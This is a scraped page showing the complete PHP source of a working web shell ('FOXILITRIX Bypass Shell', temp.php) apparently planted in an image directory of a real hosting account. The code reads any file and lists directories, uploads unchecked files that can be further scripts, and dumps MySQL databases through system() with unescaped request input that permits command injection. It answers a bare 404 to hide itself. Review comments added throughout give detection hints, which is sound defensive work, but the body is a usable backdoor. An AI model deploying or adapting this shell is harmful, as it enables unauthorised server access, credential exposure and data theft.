FOXILITRIX Bypass Shell

echo"
FOXILITRIX
";
Current Path : /home/baheco/public_html/img/

Linux sd-1582531-l.dattaweb.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Current File : /home/baheco/public_html/img/temp.php

<?php

/**
 * Content search behind the "Search" form: walks $dir recursively and echoes
 * an <li> link for every file whose contents contain $word.
 *
 * The match is case-insensitive (stristr). Each hit links to
 * temp.php?path=<resolved file>; this script's path handler renders that
 * target with highlight_file() when it is not a directory.
 *
 * @param string $dir  Directory to start from; handed to scandir() as-is.
 * @param string $word Substring looked for in each file's contents.
 * @return void Results are written with echo; nothing is returned.
 */
function recurs($dir, $word) {
    // scandir()'s return value is not checked; on an unreadable directory it
    // returns false and the foreach below raises a warning instead of iterating.
    $files = scandir($dir);
	
    foreach ($files as $file) {
        // Skip the self/parent entries so the walk only descends.
        if ($file == '.' or $file == '..') {
            continue;
        }

        // realpath() resolves symlinks, so the walk follows links out of the
        // starting tree. No depth limit or visited-set is kept anywhere in this
        // function. NOTE(review): one search request can therefore be a long,
        // read-heavy job in the PHP worker.
        $full_path = realpath($dir.'/'.$file);
		
        if (is_dir($full_path)) {
            recurs($full_path, $word);
        }
		else {
            // The whole file is loaded into memory just to test for the substring.
            if (stristr(file_get_contents($full_path), $word) !== false) {
                // Path is URL-encoded for the href and HTML-escaped for the link text.
                echo "<li><a href='temp.php?path=".urlencode($full_path)."'>".htmlspecialchars($full_path)."</a></li>";
            }
        }
    }
}

/**
 * List the entries of $dir with directories first, then files, each group
 * sorted with sort().
 *
 * '.' and '..' are not filtered out here; both pass is_dir() and so end up in
 * the directory group of the returned list.
 *
 * @param string $dir Directory to list; handed to scandir() as-is.
 * @return array Re-indexed list of entry names (directories, then files).
 */
function sort_scandir($dir) {
    // Return value is not checked; scandir() yields false on failure.
    $items = scandir($dir);
    
    $folders = array();
    $files   = array();
    
    foreach ($items as $item) {
        // Entries are keyed by their own name; the keys are discarded again by
        // sort() further down, so only the values matter.
        if (is_dir($dir . '/' . $item)) {
			$folders[$item] = $item;
        }
		else {
			$files[$item] = $item;
        }
    }
	
    // sort() re-indexes both arrays from 0.
    sort($folders);
    sort($files);
    
    // Two lists merged in order: directories come before files.
    $result = array_merge($folders, $files);
    
    return $result;
}

// Request handler for the whole script. Every input below comes straight from
// $_GET / $_POST / $_FILES, and no authentication or session check appears
// anywhere in this block: any client that can reach the URL can drive it.
//
// Database export parameters, read from the query string. Because they are
// GET parameters, the credentials appear in the web server's access log.
$db   = $_GET['db'] ?? NULL;
$user = $_GET['user'] ?? NULL;
$pass = $_GET['pass'] ?? NULL;
$host = $_GET['host'] ?? NULL;

if ($db) {
	// Export branch: the response is served as a download named dump.sql.
	header('Content-Type: application/sql');
	header('Content-Disposition: attachment; filename="dump.sql"');
	header('Content-Transfer-Encoding: binary');
	// The four request values are concatenated into the command line with no
	// escapeshellarg(), so the shell interprets whatever the request supplies.
	// NOTE(review): detection points are a mysqldump child process spawned by
	// the PHP worker and db=/user=/pass=/host= query strings on a .php under an
	// image directory; system() in disable_functions would stop this branch.
	system("mysqldump --host=".$host." --user=".$user." --password=".$pass." ".$db);
	exit;
}

// Filesystem target for the browser / viewer part; not restricted to any base
// directory.
$path = $_GET['path'] ?? NULL;

if ($path) {
	if (is_dir($path)) {
		// Directory view: three forms (database connect, content search, upload)
		// are printed first, then any POST action runs, then the listing.
		//mysql
		echo "<form action='temp.php?path=".urlencode($path)."' method='POST' enctype='multipart/form-data'><input type='hidden' name='path' value='".htmlspecialchars($path)."'><input type='text' name='host' value='localhost' size='5'><input type='text' name='user' value='root' size='5'><input type='text' name='pass' size='5' placeholder='pass'><input type='text' name='db' size='5' placeholder='db'><input type='submit' name='mysql' value='Connect'></form>";
		
		//search
		echo "<form action='temp.php' method='get'><input type='hidden' name='path' value='".htmlspecialchars($path)."'><input type='text' name='recurs'><input type='submit' value='Search'></form>";
		
		//upload
		echo "<form action='temp.php?path=".urlencode($path)."' method='POST' enctype='multipart/form-data'><input type='hidden' name='path' value='".htmlspecialchars($path)."'><label for='file-upload' style='padding: 10px;cursor: pointer;'>[select file]</label><input id='file-upload' type='file' name='file' style='display:none;'><input type='submit' name='upload' value='Upload'></form>";
		
		if ($_SERVER['REQUEST_METHOD'] === 'POST') {
			if (isset($_POST['upload'])) {
				// Upload branch: the file is stored in the directory being browsed
				// under its client-supplied name. basename() strips directory
				// components, but extension, content type and size are not checked,
				// so a .php file is written as-is.
				// NOTE(review): new script files appearing in web-writable
				// directories are the artefact to look for; serving upload/image
				// directories without PHP execution neutralises this branch.
				if (isset($_FILES['file']) and $_FILES['file']['error'] == UPLOAD_ERR_OK) {
					if (move_uploaded_file($_FILES['file']['tmp_name'], $path.'/'.basename($_FILES['file']['name']))) {
						echo '<ul><i>Uploaded</i></ul>';
					}
				}
			}
			elseif (isset($_POST['mysql'])) {
				// Database branch: connect with the posted credentials and list the
				// databases. $path is overwritten from the POST body here, so the
				// search and listing code further down uses the posted value.
				$path = $_POST['path'] ?? NULL;
				$host = $_POST['host'] ?? NULL;
				$user = $_POST['user'] ?? NULL;
				$pass = $_POST['pass'] ?? NULL;
				$db   = $_POST['db'] ?? NULL;
				
				try {
					$mysqli = mysqli_connect($host, $user, $pass, $db);
					// Called before the connection is checked. NOTE(review): this
					// presumably relies on mysqli throwing on failure (the default
					// report mode from PHP 8.1) so the catch below handles it. Confirm.
					mysqli_set_charset($mysqli, 'utf8');
					
					if ($mysqli) {
						$result = $mysqli->query("SHOW DATABASES");
						
						if ($result) {
							echo '<ul>';
							while ($row = $result->fetch_assoc()) {
								$db = $row['Database'];
								// Each database name links to the export branch at the top
								// of the script; user, password and host are put in the
								// query string, so following a link logs them in clear text.
								echo "<li><a href='?db=".urlencode($db)."&user=".urlencode($user)."&pass=".urlencode($pass)."&host=".urlencode($host)."'>".htmlspecialchars($db)."</a></li>";
							}
							echo '</ul>';
						}

						mysqli_close($mysqli);
					}
				}
				catch(mysqli_sql_exception $mysqli_error) {
					// The exception detail is dropped; only a generic message is shown.
					echo "<ul><i>Connection error</i></ul>";
				}
			}
		}
		
		// Optional content search over the current directory tree.
		$recurs = $_GET['recurs'] ?? NULL;
		
		if ($recurs) {
			echo "<ul>";
			recurs($path, $recurs);
			echo "</ul>";
		}
		
		//files
		// Directory listing; the entries include '.' and '..', which gives the
		// upward navigation link once realpath() has resolved them.
		$files = sort_scandir($path);
		
		echo '<ul>';
		for($i = 0; $i < count($files); $i++) {
			$full_path = realpath($path."/".$files[$i]);
			
			echo "<li><a href='temp.php?path=".urlencode($full_path)."'>".htmlspecialchars($files[$i])."</a></li>";
		}
		echo '</ul>';
	}
	else {
		// Anything that is not a directory is printed with highlight_file(),
		// i.e. the contents of any file the PHP process can read are returned.
		highlight_file($path);
	}
}
else {
	// Without a path (or db) parameter the script answers 404 with no body, so
	// a plain request to the URL looks like a missing page.
	// NOTE(review): when hunting in access logs, look for a URL that returns 404
	// bare but 200 once ?path= is present.
	header('HTTP/1.0 404 Not Found');
	exit;
}



?>

bypass 1.0